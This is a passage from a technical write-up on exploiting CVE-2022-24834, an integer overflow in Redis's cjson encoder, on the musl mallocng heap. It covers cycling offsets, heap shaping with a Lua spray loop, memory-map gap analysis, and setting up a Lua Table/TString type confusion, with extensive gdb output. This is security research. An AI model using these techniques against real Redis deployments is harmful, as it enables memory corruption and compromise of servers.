blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.
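
The arithmetic can be sketched in a few lines. This is a simplified model based on the description above, not a transcription of enframe(): it assumes a 16-byte UNIT and a 4-byte in-band header, and it models the wrap-around as a plain modulo. The function names are hypothetical.

```python
UNIT = 16  # mallocng allocation granularity in bytes
IB = 4     # in-band header size in bytes


def slack_units(stride: int, nominal_size: int) -> int:
    """Whole UNITs left in a slot after the user data and in-band header."""
    return (stride - IB - nominal_size) // UNIT


def next_offset(previous: int, slack: int) -> int:
    """Advance the cycling offset, wrapping to 0 once it would exceed slack."""
    return (previous + 1) % (slack + 1)


print(slack_units(0x50, 0x48))    # 0: a 0x48-byte Table leaves no room to cycle
print(slack_units(0x140, 0x100))  # 3: a 0x100-byte array can start at 4 positions

offset = 1
history = []
for _ in range(5):
    history.append(offset)
    offset = next_offset(offset, slack_units(0x140, 0x100))
print(history)  # [1, 2, 3, 0, 1]
```

With zero slack units the offset is pinned at 0, which is why a 0x48-byte allocation in a 0x50-stride slot always starts at the beginning of the slot.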

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass  stride   sizeclass  stride   sizeclass  stride   sizeclass  stride
1          0x20     13         0x140    25         0xaa0    37         0x5540
2          0x30     14         0x190    26         0xcc0    38         0x6650
3          0x40     15         0x1f0    27         0xff0    39         0x7ff0
4          0x50     16         0x240    28         0x1240   40         0x9240
5          0x60     17         0x2a0    29         0x1540   41         0xaaa0
6          0x70     18         0x320    30         0x1990   42         0xccc0
7          0x80     19         0x3f0    31         0x1ff0   43         0xfff0
8          0x90     20         0x480    32         0x2480   44         0x12480
9          0xa0     21         0x540    33         0x2aa0   45         0x15540
10         0xc0     22         0x660    34         0x3320   46         0x19980
11         0xf0     23         0x7f0    35         0x3ff0   47         0x1fff0

Using a cycling offset requires an additional 4-byte in-band header,
and the offset itself advances in UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, for example if smaller allocations are sometimes placed into
larger strides rather than always allocating a new group, but I’m not
sure if that’s possible as I haven’t spent enough time studying the
allocator yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables and fill their arrays such that the resulting sizes are
~0x100 bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == heading has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address;
it starts 0x10 bytes further in. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.
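
The relationship between a slot's start and its user data can be sketched in a few lines of Python. This is only an illustration: it assumes UNIT is 16 bytes (which matches the 0x10 and 0x30 deltas in the output above), and the helper name is made up.

```python
UNIT = 0x10  # assumed mallocng UNIT size, consistent with the deltas shown above


def userdata_addr(slot_start: int, cycling_offset: int) -> int:
    """Return where user data begins inside a slot (hypothetical helper)."""
    return slot_start + cycling_offset * UNIT


# Slot addresses and cycling offsets copied from the three mchunkinfo outputs.
first_array = userdata_addr(0x7ffff7a94e30, 1)
table_slot = userdata_addr(0x7ffff7a94740, 0)
second_array = userdata_addr(0x7ffff7a96c70, 3)

print(hex(first_array), hex(table_slot), hex(second_array))
```

The three results line up with the "userdata -->" addresses that mchunkinfo reports for each slot.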

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us, even if the structures had been on a ‘stride’ group
that uses the cycling offsets: we can easily control the number
of times the slots are actually used prior to the overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes (roughly 341 MiB) to. This may be large enough to
qualify as a “wild copy,” although on a 64-bit target with the amount of
memory available on modern systems, it’s not too hard to deal with.
Exploitation requires that the target buffer we want to corrupt be adjacent
to the overflown buffer with no unmapped gaps in between, so we need at a
minimum around 350 MiB of contiguously mapped memory.
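
To make the arithmetic concrete, here is a small Python sketch. It assumes the size computation has the form len * 6 + 2 and ends up in a signed 32-bit int, as in upstream lua-cjson's json_append_string(); that formula is not quoted in this article, so treat it as an assumption. The helper names are illustrative.

```python
def to_int32(value: int) -> int:
    """Interpret the low 32 bits of value as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - 0x1_0000_0000 if value & 0x8000_0000 else value


def requested_size(str_len: int) -> int:
    """Assumed worst-case size computation: six output bytes per input byte plus quotes."""
    return to_int32(str_len * 6 + 2)


OVERFLOW_LEN = 0x15555555

wrapped = requested_size(OVERFLOW_LEN)          # wraps to a negative value
just_below = requested_size(OVERFLOW_LEN - 1)   # still positive
copy_mib = OVERFLOW_LEN / (1 << 20)             # size of the copy in MiB

print(wrapped, just_below, round(copy_mib, 1))
```

Under that assumption, 0x15555555 is the smallest string length whose computed size no longer fits in a positive 32-bit int, which is why the copy is about 341 MiB.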

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in the memory backing the group being unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, where a write would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    region between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp
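
The gdb utility itself is not reproduced in this article. The following is only a minimal Python sketch of the idea behind the annotations, working on hand-copied (start, end, perms) tuples instead of reading them from a live process. The function name, the tuple format, and the rule that ADJ is only reported for runs of two or more regions are assumptions inferred from the output above.

```python
def annotate(mappings):
    """Return (kind, size) notes for a list of (start, end, perms) sorted by start."""
    notes = []
    run_start, run_count, prev_end = None, 0, None

    def close_run():
        # Emit an ADJ note if the run that just ended had at least two regions.
        nonlocal run_start, run_count
        if run_count > 1:
            notes.append(("ADJ", prev_end - run_start))
        run_start, run_count = None, 0

    for start, end, perms in mappings:
        if prev_end is not None and start > prev_end:
            close_run()
            notes.append(("GAP", start - prev_end))
        if perms.startswith("---"):
            close_run()
            notes.append(("GUARD", end - start))
        else:
            if run_count == 0:
                run_start = start
            run_count += 1
        prev_end = end
    close_run()
    return notes


# Entries 12 through 19 from the listing above.
sample = [
    (0x7ffff3749000, 0x7ffff470a000, "rw-p"),
    (0x7ffff4717000, 0x7ffff4c01000, "rw-p"),
    (0x7ffff4c02000, 0x7ffff4e00000, "rw-p"),
    (0x7ffff4e00000, 0x7ffff5201000, "rw-p"),
    (0x7ffff5201000, 0x7ffff5c00000, "rw-p"),
    (0x7ffff5c00000, 0x7ffff5e01000, "rw-p"),
    (0x7ffff5e01000, 0x7ffff6000000, "rw-p"),
    (0x7ffff6000000, 0x7ffff6002000, "---p"),
]
notes = annotate(sample)
for kind, size in notes:
    print(f"{kind}: {size:#x}")
```

For this excerpt the sketch reports the same two gaps, the 0x13fe000 adjacent run, and the guard page that the listing shows.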

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big as or larger than the
amount of memory that will actually be written during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice, after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), whereas sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating-point numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end
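
The numbers in the Lua snippet can be sanity-checked with a short Python sketch. It assumes a 16-byte TValue (consistent with the 0x10 spacing of TValue addresses elsewhere in this article), that Lua grows the array part of a table to the next power of two when filled sequentially, and that the allocator's metadata overhead is less than one 4 KiB page. The overhead value and helper names are placeholders, not measured values.

```python
TVALUE_SIZE = 0x10        # assumed size of a TValue on this 64-bit build
PAGE = 0x1000
MMAP_THRESHOLD = 0x1FFEC  # threshold quoted above


def next_pow2(n: int) -> int:
    """Smallest power of two that is >= n."""
    p = 1
    while p < n:
        p *= 2
    return p


def array_mapping_size(entries: int, overhead: int = 0x20) -> int:
    """Estimate the mmap() size backing a table array of `entries` numbers."""
    array_bytes = next_pow2(entries) * TVALUE_SIZE
    if array_bytes <= MMAP_THRESHOLD:
        raise ValueError("allocation would not get its own single-slot group")
    # Round the allocation plus (placeholder) metadata overhead up to whole pages.
    return -(-(array_bytes + overhead) // PAGE) * PAGE


mapping = array_mapping_size(0xD000)
spray_count = 0x15560000 // 0x101000 + 1
total_filler = spray_count * mapping

print(hex(mapping), spray_count, hex(total_filler))
```

With these assumptions, 0xD000 entries round up to a 0x10000-entry array, each table produces one 0x101000-byte mapping, and the 341 tables together cover slightly more than the 0x15555555 bytes written by the overflow.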

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with a layout where each
new table allocation results in a new array mapping, like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

One more thing to note is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems to be due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this much, but it is likely possible to
get rid of the nondeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
while increasing the length. The main caveat of multiple attempts is that,
due to corruption of legitimate chunks, we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, and each attempt that we make will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricerca Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group,
starting from a table whose address we know:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. What we want to
analyze, however, is the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

